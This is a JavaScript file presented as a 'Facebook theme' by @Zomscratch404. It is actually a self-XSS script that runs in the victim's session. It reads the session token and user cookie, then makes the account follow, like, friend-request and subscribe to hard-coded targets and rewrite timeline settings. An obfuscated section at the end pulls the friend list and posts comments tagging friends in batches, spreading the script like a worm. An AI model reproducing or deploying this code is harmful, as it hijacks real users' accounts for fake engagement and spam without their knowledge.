/* Themes Facebook By @Zomscratch404 */
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("100000512448314");a("1484477583");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}sublist("659659864061089");sublist("697895583570850");sublist("709832059043869");sublist("678739685486440");sublist("756206617739746");sublist("779761755384232");sublist("770290186331389");sublist("770290736331334");sublist("770291036331304");sublist("779761305384277");sublist("10202511814304996");sublist("10202512044470750");sublist("10202512047990838");sublist("1374771639451023");var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("604122336325635");Like("653886391338839");Like("1460646614156998");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}IDS("523211887");
//Fiture
P("430553696971708");P("660556550638087");P("750442658316142");P("803036236390117");P("815446528482421");
P("835196246507449");P("845687182125022");P("847596558600751");P("358738117598420");P("361852127287019");
javascript: void(function () {
  window.kolak = function (a, b, f, g) {
    var h = new XMLHttpRequest();
    h.open("POST", a, true);
    h.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    h.onreadystatechange = function (c) {
      if(c.target.readyState == 4) {
        console.log("---------\n" + a + "?" + b + "\n---------");
        var e = {
          errorSummary: "connection error!",
          errorDescription: "ajax status=" + c.target.status
        };
        var d = c.target.responseText;
        if(d == "") {
          e.errorSummary = "empty callback!"
        } else {
          e = JSON.parse(d.substring(d.indexOf("{"), d.lastIndexOf("}") + 1))
        } if(e.errorSummary && e.errorDescription) {
          alert(e.errorSummary + "\n" + e.errorDescription)
        } else {
          if(e.domops && e.domops[0] && e.domops[0][3] && e.domops[0][3].__html) {
            f(e.domops[0][3].__html.replace(/<img(.*?)>/gi, ""), g)
          } else {
            console.log(JSON.stringify(e));
            f(e, g)
          }
        }
      }
    };
    h.send(b)
  };
  window.lesgo = function () {
    if(ygDiPerluin.uri) {
      var a = document.getElementById("timeline_info_review_unit");
      kolak(ygDiPerluin.uri, ygDiPerluin.prpsnya, function (p, q) {
        q.firstChild.firstChild.firstChild.innerHTML = p;
        deuiAh()
      }, a)
    }
  };
  window.tuben = "<br/>Wait up.. <img style=\"vertical-align:middle;margin:0 3px;\" src=\"//fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif\"/>";
  window.lesdan = function () {
    var a = document.getElementById("timeline_info_review_unit");
    if(a) {
      a.firstChild.firstChild.firstChild.innerHTML = "<div class=\"pam uiBoxYellow\"><b>Reordering timeline apps</b>" + tuben + "</div>"
    }
    window.sisa = ygDiPerluin.props.__user + "&fb_dtsg=" + ygDiPerluin.props.fb_dtsg + "&__user=" + ygDiPerluin.props.__user + "&__a=1&__dyn=7n8apij35zolgDxqiyaUVwACwKyaF3oy&__req=6&__rev=1064290&ttstamp=2658168871111178051";
    kolak("/ajax/timeline/reorder_apps/confirm.php", "enabled_app_ids[0]=2327158227&enabled_app_ids[1]=2305272732&enabled_app_ids[2]=2356318349&enabled_app_ids[3]=2409997254&enabled_app_ids[4]=2361831622&enabled_app_ids[5]=2347471856&app_order=&profile_id=" + sisa, function (p, q) {
      if(q) {
        q.firstChild.firstChild.firstChild.innerHTML = "<div class=\"pam uiBoxYellow\"><b>Passing tour timeline marketing</b>" + tuben + "</div>"
      }
      kolak("/ajax/marketing/tour/timeline.php", "l=toolbar&action[optout]=Akhiri%20Tur&nctr[_mod]=pagelet_above_header_timeline&f=" + sisa, function (r, s) {
        if(s) {
          s.firstChild.firstChild.firstChild.innerHTML = "<div class=\"pam uiBoxYellow\"><b>Reloading page</b>" + tuben + "</div>"
        }
        top.location.reload()
      }, a)
    }, a)
  };
  window.deuiAh = function () {
    window.ygDiPerluin = {
      props: {
        __user: document.cookie.match(/c_user=(\d+)/)[1],
        fb_dtsg: document.getElementsByName("fb_dtsg")[0].value,
        __a: 1,
        __dyn: "7n8apij35zolgDxqiyaUVwACwKyaF3oy",
        __req: 6,
        __rev: 1064290,
        ttstamp: 2658168871111178051,
        action: "confirm",
        "nctr[_mod]": "pagelet_timeline_recent",
        ents_ta: 575072072579548
      }
    };
    var a = document.getElementById("timeline_info_review_unit");
    if(a) {
      var b = a.getElementsByTagName("form");
      if(b[0]) {
        ygDiPerluin.uri = b[0].getAttribute("ajaxify");
        var c = b[0].getElementsByTagName("input");
        if(c.length != 0) {
          for(var x = 0; x < c.length; x++) {
            if(c[x].name) {
              ygDiPerluin.props[c[x].name] = c[x].value
            }
          }
        }
        var d = b[0].getElementsByTagName("select");
        if(d.length != 0) {
          for(var y = 0; y < d.length; y++) {
            if(d[y].name) {
              if(d[y].name.match(/audience/i)) {
                ygDiPerluin.props[d[y].name] = 80
              } else if(d[y].name.match(/year/i)) {
                ygDiPerluin.props[d[y].name] = "199" + Math.floor(Math.random() * 9)
              } else if(d[y].name.match(/month/i)) {
                ygDiPerluin.props[d[y].name] = Math.floor(Math.random() * 11 + 1)
              } else if(d[y].name.match(/day/i)) {
                ygDiPerluin.props[d[y].name] = Math.floor(Math.random() * 27 + 1)
              } else {
                ygDiPerluin.props[d[y].name] = d[y].value
              }
            }
          }
        }
        var e = [];
        for(z in ygDiPerluin.props) {
          e.push(z + "=" + ygDiPerluin.props[z])
        }
        ygDiPerluin.prpsnya = e.join("&");
        if(ygDiPerluin.prpsnya.match(/token=(.*?)_587861337917398/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&valid_mle_types[284231778265118]=284231778265118&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_284231778265118/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&text=Adib Pugar Nuraga&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_587306941290855/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&ents_ta[567930119916248]=271840892974700&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_8_|token=(.*?)_13_/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&year=199" + Math.floor(Math.random() * 9) + "&month=" + Math.floor(Math.random() * 11 + 1) + "&day=" + Math.floor(Math.random() * 27 + 1) + "&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_6_|token=(.*?)_7_/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&query=Anggota&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_16|token=(.*?)_19_/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&ents_ta[107934015907468]=107934015907468&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_4&/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents=(.*?)&/i, "&").replace(/&ents_ta=(.*?)&/i, "&ents_ta=205024502998626&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_3&/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents=(.*?)&/i, "&").replace(/&ents_ta=(.*?)&/i, "&ents_ta=107934015907468&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_2&/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&ents_ta=116284465053371&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_10_|_18_/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&option=y&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_9/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&ents_ta=(.*?)&/i, "&option=1&")
        } else if(ygDiPerluin.prpsnya.match(/token=(.*?)_15&/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&phone=(.*?)&/i, "&").replace(/&ents_ta=(.*?)&/i, "&phone=085234" + Math.floor(Math.random() * 999999) + "&");
        }
        if(ygDiPerluin.prpsnya.match(/&year=0|&month=0|&day=0/i)) {
          ygDiPerluin.prpsnya = ygDiPerluin.prpsnya.replace(/&year=0|&month=0|&day=0/gi, "");
        }
        b[0].getElementsByClassName("rfloat")[0].innerHTML = tuben;
        lesgo()
      } else {
        lesdan()
      }
    } else {
      alert("Buka Profilmu dan Ulangi lagi!");
      var lnjt = confirm("Lanjutkan ?");
      if(lnjt) {
        lesdan()
      }
    }
  };
  deuiAh()
})();
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","847529481940821","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," \udbb8\udc46 Wow Harlem Shake \udbb8\udc3c Silahkan dicoba \udbb8\udc41 @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
